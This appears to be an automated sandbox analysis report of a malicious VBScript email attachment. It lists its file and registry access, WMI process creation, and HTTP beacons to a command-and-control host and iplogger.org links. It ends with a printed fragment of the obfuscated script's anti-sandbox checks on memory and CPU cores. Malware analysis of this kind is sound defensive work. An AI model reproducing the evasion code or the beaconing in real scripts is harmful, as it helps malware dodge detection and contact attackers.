Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini |
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local |
Source: Joe Sandbox View | IP Address: 88.99.66.31 |
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877 |
Source: global traffic | HTTP traffic detected:
GET /api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBkab56Bm_2/FWmqnzUOX9_2B0/YbRWfB6IMq7TSr21K5FNM/xWmFuq_2FeEONGMO/1ZuPh_2FNFAeM3T/FM11WlspOeJ_2FqYpl/U_2F6jwXu/YXiyreYoS1UAkST_2FVa/JT_2Fx9W7QvoG6HJsdC/ExFIoNdpiPpyKG7cmJGp40/huNnlqBJ9uVVH/QyyRFE1b/30os8htaDb_2FAitT_2BOsm/SKMxwp3_0A/_0DyvsrFrDpoMB3eg/_2BPhnWhGFuU/FPA93GCv8Zd/FBoszW1uVg1_2B/gtKiRyRf4RAjLF4_2F0P1/_2FR HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: golang.feel500.at
Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected:
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: golang.feel500.at
Connection: Keep-Alive |
Source: msapplication.xml0.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml0.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml5.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml5.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml7.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: msapplication.xml7.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: unknown | DNS traffic detected: queries for: iplogger.org |
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 16 Dec 2020 19:42:24 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30 |
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp | String found in binary or memory: http://crl.com |
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp | String found in binary or memory: http://crl.com9 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# |
Source: {CFFA0380-3FD6-11EB-90EB-ECF4BBEA1588}.dat.17.dr, ~DFCE3CEB3DA92FCDD0.TMP.17.dr | String found in binary or memory: http://golang.feel500.at/api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBka |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy |
Source: msapplication.xml.17.dr | String found in binary or memory: http://www.amazon.com/ |
Source: msapplication.xml1.17.dr | String found in binary or memory: http://www.google.com/ |
Source: msapplication.xml2.17.dr | String found in binary or memory: http://www.live.com/ |
Source: msapplication.xml3.17.dr | String found in binary or memory: http://www.nytimes.com/ |
Source: msapplication.xml4.17.dr | String found in binary or memory: http://www.reddit.com/ |
Source: msapplication.xml5.17.dr | String found in binary or memory: http://www.twitter.com/ |
Source: msapplication.xml6.17.dr | String found in binary or memory: http://www.wikipedia.com/ |
Source: msapplication.xml7.17.dr | String found in binary or memory: http://www.youtube.com/ |
Source: wscript.exe, 00000000.00000003.711863605.000001C8B6372000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/ |
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712532222.000001C8B5BEB000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712769407.000001C8B4CF0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/18j267 |
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/18j267Nums |
Source: wscript.exe, 00000000.00000003.712665350.000001C8B3A16000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1D5y47 |
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753 |
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443 |
Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY |
Source: view_attach_72559.vbs | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal84.troj.evad.winVBS@4/52@2/2 |
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFFA037E-3FD6-11EB-90EB-ECF4BBEA1588}.dat |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs' |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create |
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2 |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2 |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: view_attach_72559.vbs | Static file information: File size 1478801 > 1048576 |
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll |
Source: Oxnard.rb.0.dr | Binary string: c:\valueState\Redparagraph\unitList\Hislay\weight.pdb |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep 2000If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) ThenExit FunctionEnd If' Kankakee blasphemy sunrise bramble screwworm ho religiosity. 8769309 hoot ambitious foppish grandmother tutu widen754 passerby scratchy892 bossy109. Verde274 Byrne. 4049332 Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_ComputerSystem")For Each rTSNo In kdDsaHAdlItemsKlcIhm = KlcIhm + Int((rTSNo.TotalPhysicalMemory) / (((81 - 2.0) + (1055520 - 278.0)) - 6745.0))NextIf KlcIhm < ((8197 - (7235 - 89.0)) - (22 - 1.0)) ThenHThYFgq' novo Auckland shrewd freedman persecutory thieves745 videotape Vega regent snowy cop cremate committee126 reticulum995 spigot charisma50 End IfREM regress bangle, 8711784 insubstantial359 michigan effectuate Reagan sin770 earmark discriminant notate. purify, conversion571 standeth vane ' sidereal600 evocate dance denude burst automorphism uranium Aldrich diffract stamp Bergland signal groan railway Erik villa Leon commendatory peptide alga End FunctionFunction spurn163()REM afternoon Barnhard230. alga500 whale Britain torso rapture slid indecomposable trudge Filipino. bazaar, big Hahn, cookery guilty debase, 419631 culprit Leland critic lusty cantor pater tate IEEE ceramic, 7701 crunchy verdict. effete, boulder voyage717 on error resume nextIf (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then' peak Bethlehem Terre Posner stifle Agee quartermaster204 NH dauphin nomad their neither scarves Exit FunctionREM autocollimate Giuliano attainder isle epidemic longue spoonful ambulant j Cinderella influenza hydrous Finn. 
Methuselah attune rectitude cervix End IfSet AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_Processor", , (((4 + 300.0) - 267.0) + (28 - 17.0)))' Kelvin scoff castor niece bump fiefdom491 lap sing thieving yearbook hydroxide. milestone rule. regrettable, vivify. 2683417 Lausanne ounce complain For Each rTSNo In kdDsaHAdlItems' roundworm glad capitol beachhead. nay Malthus replica. acquaint ampere iodine vermilion saw If rTSNo.NumberOfCores < ((25 - (22 - (15 - 13.0))) - 2.0) Thenchaotic = True' bipolar dodecahedral518 indium polysemous documentation262 capacitance tine thicken stature crest187 petition adject spectrography polymeric howdy. sheave taft112 indubitable, conjuncture near End IfNextIf chaotic Then' industrial Al |